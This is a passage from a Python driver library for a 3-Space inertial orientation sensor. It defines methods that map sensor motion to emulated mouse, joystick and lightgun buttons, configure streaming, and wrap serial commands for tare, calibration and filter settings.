@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = 1 + hid_type
# Set mode
if not self.setControlMode(cntl_class, button_idx, 0):
return False
# Create data
if button_bind != TSS_BUTTON_LEFT and button_bind != TSS_BUTTON_RIGHT:
_print("Invalid command for button_bind: {0:d}".format(button_bind))
return False
data = button_bind
# Set data
return self.setControlData(cntl_class, button_idx, 0, data)
def setOrientationButton(self, hid_type, button_idx, local_axis, global_axis, max_dist):
""" Sets up a device's button such that it is 'pressed' when a reference
vector aligns itself with a local vector.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param button_idx: An integer whose value defines which button on
the emulated device to configure. Default range is 0 through 7.
@param local_axis: A list of 3 floats whose value represents a
normalized Vector3. This vector represents the sensor's local
vector to track.
@param global_axis: A list of 3 floats whose value is a normalized
Vector3. This vector represents the global vector to move the
local vector towards for "pressing" (should not be colinear to
the local vector).
@param max_dist: A float whose value defines how close the local
vector's orientation must be to the global vector for the button
to be 'pressed'.
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = 1 + hid_type
# Set mode
if not self.setControlMode(cntl_class, button_idx, 1):
return False
# Create data array
data_array = local_axis + global_axis + [max_dist]
# Set data
for i in range(7):
if not self.setControlData(cntl_class, button_idx, i, data_array[i]):
return False
return True
def setShakeButton(self, hid_type, button_idx, threshold):
""" Sets up an emulated device's button such that it is 'pressed' when
the sensor is shaken.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param button_idx: An integer whose value defines which button on
the emulated device to configure. Default range is 0 through 7.
@param threshold: A float whose value defines how many Gs of force
must be experienced by the sensor before the button is
'pressed'.
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = 1 + hid_type
# Set mode
if not self.setControlMode(cntl_class, button_idx, 2):
return False
# Create data array
data_array = [0, 0, 0, threshold]
# Set data
for i in range(4):
if not self.setControlData(cntl_class, button_idx, i, data_array[i]):
return False
return True
def disableButton(self, hid_type, button_idx):
""" Disables a button on the passed in emulated device.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param button_idx: An integer whose value defines which button on
the emulated device to configure. Default range is 0 through 7.
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = 1 + hid_type
# Set mode
return self.setControlMode(cntl_class, button_idx, 255)
# Convenience functions for setting up simple mouse/joystick implimentations
def setupSimpleMouse(self, diagonal_size, dist_from_screen, aspect_ratio, is_relative=True):
""" Creates a simple emulated mouse device using the features of the
sensor. Left button and right button emulate the mouse's left and
right buttons respectivly and using the sensor as a pointing device
with the front of the device facing towards the screen will move the
mouse cursor.
@param diagonal_size: A float whose value is the real world diagonal
size of the user's screen.
@param dist_from_screen: A float whose value is the real world
distance the sensor is from the user's screen. Must be the same
units as diagonal_size.
@param aspect_ratio: A float whose value is the real world aspect
ratio of the user's screen.
@param is_relative: A boolean whose value expresses whether the
mouse is to operate in relative mode (True) or absolute mode
(False).
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
cur_mouse_rel = self.getMouseAbsoluteRelativeMode()
if cur_mouse_rel != is_relative:
if self.setMouseAbsoluteRelativeMode(is_relative):
fail_byte, t_stamp, data = self.writeRead('softwareReset')
if not fail_byte:
while self.getSerialNumber():
pass
self.close()
time.sleep(5)
while self.reconnect():
pass
unit_hyp = (aspect_ratio ** 2 + 1) ** 0.5
screen_multiplyer = diagonal_size / unit_hyp
screen_width = screen_multiplyer * aspect_ratio
screen_height = screen_multiplyer
_print("Height: {0:2f}".format(screen_height))
_print("Width: {0:2f}".format(screen_width))
self.setScreenPointAxis(TSS_MOUSE, "X", dist_from_screen, screen_width, "X", "Z", 50)
self.setScreenPointAxis(TSS_MOUSE, "Y", dist_from_screen, screen_height, "Y", "Z", 50)
self.setPhysicalButton(TSS_MOUSE, 0, TSS_BUTTON_LEFT)
self.setPhysicalButton(TSS_MOUSE, 1, TSS_BUTTON_RIGHT)
self.disableButton(TSS_MOUSE, 2)
self.disableButton(TSS_MOUSE, 3)
self.disableButton(TSS_MOUSE, 4)
self.disableButton(TSS_MOUSE, 5)
self.disableButton(TSS_MOUSE, 6)
self.disableButton(TSS_MOUSE, 7)
def setupSimpleJoystick(self, deadzone, scale, power, shake_threshold, max_dist):
""" Creates a simple emulated joystick device using the features of the
sensor. The left and right physical buttons on the sensor act as
buttons 0 and 1 for the joystick. Button 2 is a shake button.
Buttons 3 and 4 are pressed when the sensor is rotated +-90 degrees
on the Z-axis. Rotations on the sensor's Y and X axis correspond to
movements on the joystick's X and Y axis.
@param deadzone: A float that defines the minimum distance necessary
for the device's axis to read a non-zero value.
@param scale: A float that defines the linear scale for the values
being returned for the axis.
@param power:A float whose value is an exponental power used to
further modify data being returned from the sensor.
@param shake_threshold: A float whose value defines how many Gs of
force must be experienced by the sensor before the button 2 is
'pressed'.
@param max_dist: A float whose value defines how close the local
vector's orientation must be to the global vector for buttons 3
and 4 are "pressed".
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
self.setGlobalAxis(TSS_JOYSTICK, "X", [1, 0, 0], [0, 0, -1], deadzone, scale, power)
self.setGlobalAxis(TSS_JOYSTICK, "Y", [0, 1, 0], [0, 0, -1], deadzone, scale, power)
self.setPhysicalButton(TSS_JOYSTICK, 0, TSS_BUTTON_LEFT)
self.setPhysicalButton(TSS_JOYSTICK, 1, TSS_BUTTON_RIGHT)
self.setShakeButton(TSS_JOYSTICK, 2, shake_threshold)
self.setOrientationButton(TSS_JOYSTICK, 3, [0, 1, 0], [-1, 0, 0], max_dist)
self.setOrientationButton(TSS_JOYSTICK, 4, [0, 1, 0], [1, 0, 0], max_dist)
self.disableButton(TSS_JOYSTICK, 5)
self.disableButton(TSS_JOYSTICK, 6)
self.disableButton(TSS_JOYSTICK, 7)
# LightGun Functions
def setupSimpleLightgun(self, diagonal_size, dist_from_screen, aspect_ratio, is_relative=True):
""" Creates a simple emulated mouse based lightgun device using the
features of the sensor. Left button of the sensor emulates the
mouse's left button. Shaking the sensor emulates the mouse's right
button. This configuration uses the sensor as a pointing device with
the front of the device facing forward the screen will move the
mouse cursor.
@param diagonal_size: A float whose value is the real world diagonal
size of the user's screen.
@param dist_from_screen: A float whose value is the real world
distance the sensor is from the user's screen. Must be the same
units as diagonal_size.
@param aspect_ratio: A float whose value is the real world aspect
ratio of the user's screen.
@param is_relative: A boolean whose value expresses whether the
mouse is to operate in relative mode (True) or absolute mode
(False).
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
cur_mouse_rel = self.getMouseAbsoluteRelativeMode()
if cur_mouse_rel != is_relative:
if self.setMouseAbsoluteRelativeMode(is_relative):
fail_byte, t_stamp, data = self.writeRead('softwareReset')
if not fail_byte:
while self.getSerialNumber():
pass
self.close()
time.sleep(5)
while self.reconnect():
pass
unit_hyp = (aspect_ratio ** 2 + 1) ** 0.5
screen_multiplyer = diagonal_size / unit_hyp
screen_width = screen_multiplyer * aspect_ratio
screen_height = screen_multiplyer
_print("Height: {0:2f}".format(screen_height))
_print("Width: {0:2f}".format(screen_width))
self.setScreenPointAxis(TSS_MOUSE, "X", dist_from_screen, screen_width, "X", "Z", 50)
self.setScreenPointAxis(TSS_MOUSE, "Y", dist_from_screen, screen_height, "Y", "Z", 50)
self.setPhysicalButton(TSS_MOUSE, 0, TSS_BUTTON_LEFT)
self.setShakeButton(TSS_MOUSE, 1, 1.0)
self.disableButton(TSS_MOUSE, 2)
self.disableButton(TSS_MOUSE, 3)
self.disableButton(TSS_MOUSE, 4)
self.disableButton(TSS_MOUSE, 5)
self.disableButton(TSS_MOUSE, 6)
self.disableButton(TSS_MOUSE, 7)
## 80(0x50)
def setStreamingSlots(self, slot0='null',
slot1='null',
slot2='null',
slot3='null',
slot4='null',
slot5='null',
slot6='null',
slot7='null'):
slots = [slot0, slot1, slot2, slot3, slot4, slot5, slot6, slot7]
slot_bytes = []
for slot in slots:
cmd_byte = self.command_dict[slot][0]
slot_bytes.append(cmd_byte)
fail_byte, timestamp, filler = self.writeRead('_setStreamingSlots', slot_bytes)
self.stream_slot_cmds = slots
self._generateStreamParse()
return not fail_byte
## 81(0x51)
def getStreamingSlots(self):
if self.stream_slot_cmds is None:
self.stream_slot_cmds = ['null'] * 8
fail_byte, timestamp, slot_bytes = self.writeRead('_getStreamingSlots')
need_update = False
if slot_bytes:
for slot_idx in range(len(self.stream_slot_cmds)):
cmd_byte = slot_bytes[slot_idx]
cmd_string = self.reverse_command_dict[cmd_byte]
if self.stream_slot_cmds[slot_idx] != cmd_string:
self.stream_slot_cmds[slot_idx] = cmd_string
need_update = True
if need_update:
self._generateStreamParse()
return self.stream_slot_cmds
## 82(0x52)
def setStreamingTiming(self, interval, duration, delay, timestamp=False):
arg_list = (interval, duration, delay)
fail_byte, t_stamp, data = self.writeRead('_setStreamingTiming', arg_list)
if not fail_byte:
self.stream_timing = arg_list
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 83(0x53)
def getStreamingTiming(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('_getStreamingTiming')
if data:
self.stream_timing = data
if timestamp:
return (data, t_stamp)
return data
## 84(0x54)
def getStreamingBatch(self, timestamp=False):
if self.stream_parse is None:
self._generateStreamParse()
fail_byte, t_stamp, data = self.writeRead('_getStreamingBatch')
if timestamp:
return (data, t_stamp)
return data
## 85(0x55)
def stopStreaming(self):
self.record_data = False
fail_byte, timestamp, slot_bytes = self.writeRead('stopStreaming')
return not fail_byte
## 86(0x56)
def startStreaming(self, start_record=False):
self.record_data = start_record
if self.stream_parse is None:
self._generateStreamParse()
fail_byte, timestamp, slot_bytes = self.writeRead('startStreaming')
return not fail_byte
## generated functions USB and WL_ and EM_ and DL_ and BT_
## 0(0x00)
def getTaredOrientationAsQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 1(0x01)
def getTaredOrientationAsEulerAngles(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsEulerAngles')
if timestamp:
return (data, t_stamp)
return data
## 2(0x02)
def getTaredOrientationAsRotationMatrix(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsRotationMatrix')
if timestamp:
return (data, t_stamp)
return data
## 3(0x03)
def getTaredOrientationAsAxisAngle(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsAxisAngle')
if timestamp:
return (data, t_stamp)
return data
## 4(0x04)
def getTaredOrientationAsTwoVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredOrientationAsTwoVector')
if timestamp:
return (data, t_stamp)
return data
## 5(0x05)
def getDifferenceQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getDifferenceQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 6(0x06)
def getUntaredOrientationAsQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 7(0x07)
def getUntaredOrientationAsEulerAngles(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsEulerAngles')
if timestamp:
return (data, t_stamp)
return data
## 8(0x08)
def getUntaredOrientationAsRotationMatrix(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsRotationMatrix')
if timestamp:
return (data, t_stamp)
return data
## 9(0x09)
def getUntaredOrientationAsAxisAngle(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsAxisAngle')
if timestamp:
return (data, t_stamp)
return data
## 10(0x0a)
def getUntaredOrientationAsTwoVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredOrientationAsTwoVector')
if timestamp:
return (data, t_stamp)
return data
## 11(0x0b)
def getTaredTwoVectorInSensorFrame(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTaredTwoVectorInSensorFrame')
if timestamp:
return (data, t_stamp)
return data
## 12(0x0c)
def getUntaredTwoVectorInSensorFrame(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUntaredTwoVectorInSensorFrame')
if timestamp:
return (data, t_stamp)
return data
## 16(0x10)
def setEulerAngleDecompositionOrder(self, angle_order, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setEulerAngleDecompositionOrder', angle_order)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 17(0x11)
def setMagnetoresistiveThreshold(self, threshold, trust_frames, lockout_decay, perturbation_detection_value, timestamp=False):
arg_list = (threshold, trust_frames, lockout_decay, perturbation_detection_value)
fail_byte, t_stamp, data = self.writeRead('setMagnetoresistiveThreshold', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 18(0x12)
def setAccelerometerResistanceThreshold(self, threshold, lockout_decay, timestamp=False):
arg_list = (threshold, lockout_decay)
fail_byte, t_stamp, data = self.writeRead('setAccelerometerResistanceThreshold', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 19(0x13)
def offsetWithCurrentOrientation(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('offsetWithCurrentOrientation')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 20(0x14)
def resetBaseOffset(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('resetBaseOffset')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 21(0x15)
def offsetWithQuaternion(self, quaternion, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('offsetWithQuaternion', quaternion)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 22(0x16)
def setBaseOffsetWithCurrentOrientation(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setBaseOffsetWithCurrentOrientation')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 32(0x20)
def getAllNormalizedComponentSensorData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAllNormalizedComponentSensorData')
if timestamp:
return (data, t_stamp)
return data
## 33(0x21)
def getNormalizedGyroRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getNormalizedGyroRate')
if timestamp:
return (data, t_stamp)
return data
## 34(0x22)
def getNormalizedAccelerometerVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getNormalizedAccelerometerVector')
if timestamp:
return (data, t_stamp)
return data
## 35(0x23)
def getNormalizedCompassVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getNormalizedCompassVector')
if timestamp:
return (data, t_stamp)
return data
## 37(0x25)
def getAllCorrectedComponentSensorData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAllCorrectedComponentSensorData')
if timestamp:
return (data, t_stamp)
return data
## 38(0x26)
def getCorrectedGyroRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCorrectedGyroRate')
if timestamp:
return (data, t_stamp)
return data
## 39(0x27)
def getCorrectedAccelerometerVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCorrectedAccelerometerVector')
if timestamp:
return (data, t_stamp)
return data
## 40(0x28)
def getCorrectedCompassVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCorrectedCompassVector')
if timestamp:
return (data, t_stamp)
return data
## 41(0x29)
def getCorrectedLinearAccelerationInGlobalSpace(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCorrectedLinearAccelerationInGlobalSpace')
if timestamp:
return (data, t_stamp)
return data
## 43(0x2b)
def getTemperatureC(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTemperatureC')
if timestamp:
return (data, t_stamp)
return data
## 44(0x2c)
def getTemperatureF(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTemperatureF')
if timestamp:
return (data, t_stamp)
return data
## 45(0x2d)
def getConfidenceFactor(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getConfidenceFactor')
if timestamp:
return (data, t_stamp)
return data
## 64(0x40)
def getAllRawComponentSensorData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAllRawComponentSensorData')
if timestamp:
return (data, t_stamp)
return data
## 65(0x41)
def getRawGyroscopeRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRawGyroscopeRate')
if timestamp:
return (data, t_stamp)
return data
## 66(0x42)
def getRawAccelerometerData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRawAccelerometerData')
if timestamp:
return (data, t_stamp)
return data
## 67(0x43)
def getRawCompassData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRawCompassData')
if timestamp:
return (data, t_stamp)
return data
## 96(0x60)
def tareWithCurrentOrientation(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('tareWithCurrentOrientation')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 97(0x61)
def tareWithQuaternion(self, quaternion, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('tareWithQuaternion', quaternion)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 98(0x62)
def tareWithRotationMatrix(self, rotation_matrix, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('tareWithRotationMatrix', rotation_matrix)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 99(0x63)
def setStaticAccelerometerTrustValue(self, trust_value, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setStaticAccelerometerTrustValue', trust_value)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 100(0x64)
def setConfidenceAccelerometerTrustValues(self, min_trust_value, max_trust_value, timestamp=False):
arg_list = (min_trust_value, max_trust_value)
fail_byte, t_stamp, data = self.writeRead('setConfidenceAccelerometerTrustValues', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 101(0x65)
def setStaticCompassTrustValue(self, trust_value, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setStaticCompassTrustValue', trust_value)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 102(0x66)
def setConfidenceCompassTrustValues(self, min_trust_value, max_trust_value, timestamp=False):
arg_list = (min_trust_value, max_trust_value)
fail_byte, t_stamp, data = self.writeRead('setConfidenceCompassTrustValues', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 103(0x67)
def setDesiredUpdateRate(self, update_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setDesiredUpdateRate', update_rate)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 105(0x69)
def setReferenceVectorMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setReferenceVectorMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 106(0x6a)
def setOversampleRate(self, samples_per_iteration, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setOversampleRate', samples_per_iteration)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 107(0x6b)
def setGyroscopeEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setGyroscopeEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 108(0x6c)
def setAccelerometerEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setAccelerometerEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 109(0x6d)
def setCompassEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setCompassEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 116(0x74)
def setAxisDirections(self, axis_direction_byte, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setAxisDirections', axis_direction_byte)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 117(0x75)
def setRunningAveragePercent(self, running_average_percent, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setRunningAveragePercent', running_average_percent)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 118(0x76)
def setCompassReferenceVector(self, reference_vector, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setCompassReferenceVector', reference_vector)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 119(0x77)
def setAccelerometerReferenceVector(self, reference_vector, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setAccelerometerReferenceVector', reference_vector)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 120(0x78)
def resetKalmanFilter(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('resetKalmanFilter')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 121(0x79)
def setAccelerometerRange(self, accelerometer_range_setting, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setAccelerometerRange', accelerometer_range_setting)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 123(0x7b)
def setFilterMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setFilterMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 124(0x7c)
def setRunningAverageMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setRunningAverageMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 125(0x7d)
def setGyroscopeRange(self, gyroscope_range_setting, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setGyroscopeRange', gyroscope_range_setting)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 126(0x7e)
def setCompassRange(self, compass_range_setting, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setCompassRange', compass_range_setting)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 128(0x80)
def getTareAsQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTareAsQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 129(0x81)
def getTareAsRotationMatrix(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTareAsRotationMatrix')
if timestamp:
return (data, t_stamp)
return data
## 130(0x82)
def getAccelerometerTrustValues(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerTrustValues')
if timestamp:
return (data, t_stamp)
return data
## 131(0x83)
def getCompassTrustValues(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassTrustValues')
if timestamp:
return (data, t_stamp)
return data
## 132(0x84)
def getCurrentUpdateRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCurrentUpdateRate')
if timestamp:
return (data, t_stamp)
return data
## 133(0x85)
def getCompassReferenceVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassReferenceVector')
if timestamp:
return (data, t_stamp)
return data
## 134(0x86)
def getAccelerometerReferenceVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerReferenceVector')
if timestamp:
return (data, t_stamp)
return data
## 140(0x8c)
def getGyroscopeEnabledState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getGyroscopeEnabledState')
if timestamp:
return (data, t_stamp)
return data
## 141(0x8d)
def getAccelerometerEnabledState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerEnabledState')
if timestamp:
return (data, t_stamp)
return data
## 142(0x8e)
def getCompassEnabledState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassEnabledState')
if timestamp:
return (data, t_stamp)
return data
## 143(0x8f)
def getAxisDirections(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAxisDirections')
if timestamp:
return (data, t_stamp)
return data
## 144(0x90)
def getOversampleRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getOversampleRate')
if timestamp:
return (data, t_stamp)
return data
## 145(0x91)
def getRunningAveragePercent(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRunningAveragePercent')
if timestamp:
return (data, t_stamp)
return data
## 146(0x92)
def getDesiredUpdateRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getDesiredUpdateRate')
if timestamp:
return (data, t_stamp)
return data
## 148(0x94)
def getAccelerometerRange(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerRange')
if timestamp:
return (data, t_stamp)
return data
## 152(0x98)
def getFilterMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getFilterMode')
if timestamp:
return (data, t_stamp)
return data
## 153(0x99)
def getRunningAverageMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRunningAverageMode')
if timestamp:
return (data, t_stamp)
return data
## 154(0x9a)
def getGyroscopeRange(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getGyroscopeRange')
if timestamp:
return (data, t_stamp)
return data
## 155(0x9b)
def getCompassRange(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassRange')
if timestamp:
return (data, t_stamp)
return data
## 156(0x9c)
def getEulerAngleDecompositionOrder(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getEulerAngleDecompositionOrder')
if timestamp:
return (data, t_stamp)
return data
## 157(0x9d)
def getMagnetoresistiveThreshold(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getMagnetoresistiveThreshold')
if timestamp:
return (data, t_stamp)
return data
## 158(0x9e)
def getAccelerometerResistanceThreshold(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerResistanceThreshold')
if timestamp:
return (data, t_stamp)
return data
## 159(0x9f)
def getOffsetOrientationAsQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getOffsetOrientationAsQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 160(0xa0)
def setCompassCalibrationCoefficients(self, matrix, bias, timestamp=False):
arg_list = []
arg_list.extend(matrix)
arg_list.extend(bias)
fail_byte, t_stamp, data = self.writeRead('setCompassCalibrationCoefficients', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 161(0xa1)
def setAccelerometerCalibrationCoefficients(self, matrix, bias, timestamp=False):
arg_list = []
arg_list.extend(matrix)
arg_list.extend(bias)
fail_byte, t_stamp, data = self.writeRead('setAccelerometerCalibrationCoefficients', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 162(0xa2)
def getCompassCalibrationCoefficients(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassCalibrationCoefficients')
if timestamp:
return (data, t_stamp)
return data
## 163(0xa3)
def getAccelerometerCalibrationCoefficients(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerCalibrationCoefficients')
if timestamp:
return (data, t_stamp)
return data
## 164(0xa4)
def getGyroscopeCalibrationCoefficients(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getGyroscopeCalibrationCoefficients')
if timestamp:
return (data, t_stamp)
return data
## 165(0xa5)
def beginGyroscopeAutoCalibration(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('beginGyroscopeAutoCalibration')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 166(0xa6)
def setGyroscopeCalibrationCoefficients(self, matrix, bias, timestamp=False):
arg_list = []
arg_list.extend(matrix)
arg_list.extend(bias)
fail_byte, t_stamp, data = self.writeRead('setGyroscopeCalibrationCoefficients', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 169(0xa9)
def setCalibrationMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setCalibrationMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 170(0xaa)
def getCalibrationMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCalibrationMode')
if timestamp:
return (data, t_stamp)
return data
## 171(0xab)
def setOrthoCalibrationDataPointFromCurrentOrientation(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setOrthoCalibrationDataPointFromCurrentOrientation')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 172(0xac)
def setOrthoCalibrationDataPointFromVector(self, type, index, vector, timestamp=False):
arg_list = (type, index, vector)
fail_byte, t_stamp, data = self.writeRead('setOrthoCalibrationDataPointFromVector', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 173(0xad)
def getOrthoCalibrationDataPoint(self, type, index, timestamp=False):
arg_list = (type, index)
fail_byte, t_stamp, data = self.writeRead('getOrthoCalibrationDataPoint', arg_list)
if timestamp:
return (data, t_stamp)
return data
## 174(0xae)
def performOrthoCalibration(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('performOrthoCalibration')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 175(0xaf)
def clearOrthoCalibrationData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('clearOrthoCalibrationData')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 227(0xe3)
def setSleepMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setSleepMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 228(0xe4)
def getSleepMode(self, timestamp=False):
